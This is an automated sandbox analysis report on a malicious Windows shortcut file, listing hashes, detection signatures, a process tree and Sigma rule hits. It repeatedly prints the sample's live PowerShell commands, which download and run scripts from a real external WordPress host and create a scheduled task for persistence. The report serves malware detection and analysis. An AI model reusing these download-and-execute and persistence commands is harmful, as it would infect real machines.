Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6K2g0GMmIE.lnk

Overview

General Information

Sample name:6K2g0GMmIE.lnk
renamed because original name is a hash value
Original sample name:215ff81b6f3a50e48d9f5acfb89f5ea3a1afd59dddbb0666f7ce97a922f60326.lnk
Analysis ID:1567189
MD5:34ee898cb6c5ae305685129bd0b02ceb
SHA1:72c04950fa82ea474c945f31dc3e7a32635689ae
SHA256:215ff81b6f3a50e48d9f5acfb89f5ea3a1afd59dddbb0666f7ce97a922f60326
Tags:lnkwww-italialife24-ituser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5532 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 1120 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5560 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 2412 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 2504 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7120 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 6668 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6704 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4508JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 4508INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x15c4:$b3: ::UTF8.GetString(
    • 0x36ab0:$b3: ::UTF8.GetString(
    • 0x36cd1:$b3: ::UTF8.GetString(
    • 0x9e1b8:$b3: ::UTF8.GetString(
    • 0xa6472:$b3: ::UTF8.GetString(
    • 0xb4bf8:$b3: ::UTF8.GetString(
    • 0xb4e19:$b3: ::UTF8.GetString(
    • 0xb7c01:$b3: ::UTF8.GetString(
    • 0xb7f83:$b3: ::UTF8.GetString(
    • 0xbaddd:$b3: ::UTF8.GetString(
    • 0xbaffe:$b3: ::UTF8.GetString(
    • 0xc13aa:$b3: ::UTF8.GetString(
    • 0xc1aec:$b3: ::UTF8.GetString(
    • 0xc2d32:$b3: ::UTF8.GetString(
    • 0x140a72:$b3: ::UTF8.GetString(
    • 0x1c580b:$b3: ::UTF8.GetString(
    • 0x1c5a2c:$b3: ::UTF8.GetString(
    • 0x1c7b86:$b3: ::UTF8.GetString(
    • 0x226872:$b3: ::UTF8.GetString(
    • 0x226aaa:$b3: ::UTF8.GetString(
    • 0x226f3d:$b3: ::UTF8.GetString(

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_4508.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potentially Suspicious PowerShell Child Processes
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, ProcessId: 5532, ProcessName: schtasks.exe
      Sigma detected: Script Interpreter Execution From Suspicious Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, ProcessId: 1120, ProcessName: wscript.exe
      Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, ProcessId: 5532, ProcessName: schtasks.exe
      Sigma detected: Suspicious Invoke-WebRequest Execution
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js ", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1120, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js ", ProcessId: 1436, ProcessName: powershell.exe
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, ProcessId: 1120, ProcessName: wscript.exe
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, ProcessId: 1120, ProcessName: wscript.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4508, TargetFilename: C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js
      Sigma detected: PowerShell Download Pattern
      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, ProcessId: 4508, ProcessName: powershell.exe
      Sigma detected: PowerShell Web Download
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, ProcessId: 4508, ProcessName: powershell.exe
      Sigma detected: Suspicious Schtasks From Env Var Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1, ProcessId: 5532, ProcessName: schtasks.exe
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, ProcessId: 4508, ProcessName: powershell.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js, ProcessId: 1120, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = 